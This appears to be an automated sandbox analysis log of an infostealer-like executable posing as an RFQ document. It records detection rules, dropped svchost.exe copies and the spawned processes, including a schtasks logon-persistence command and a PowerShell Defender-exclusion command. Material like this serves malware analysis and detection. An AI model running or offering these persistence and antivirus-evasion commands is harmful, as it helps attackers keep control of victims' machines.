Source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, IsConstructorBeginFinallyBlock.cs | Cryptographic APIs: 'CreateDecryptor'
Source: svchost.exe.0.dr, IsConstructorBeginFinallyBlock.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, slKb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, mAKJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, xQRSe0Fg.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, n3rhMa.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, MQzE4FWn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, nSmgRyX5a1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 6IMLmJtk.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 6IMLmJtk.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@87/48@3/3
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8396
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7872
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7792
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7748
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9188:120:WilError_03
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | File created: C:\Users\user\AppData\Local\Temp\tmp89F4.tmp
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | ReversingLabs: Detection: 36%
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | File read: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe"
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
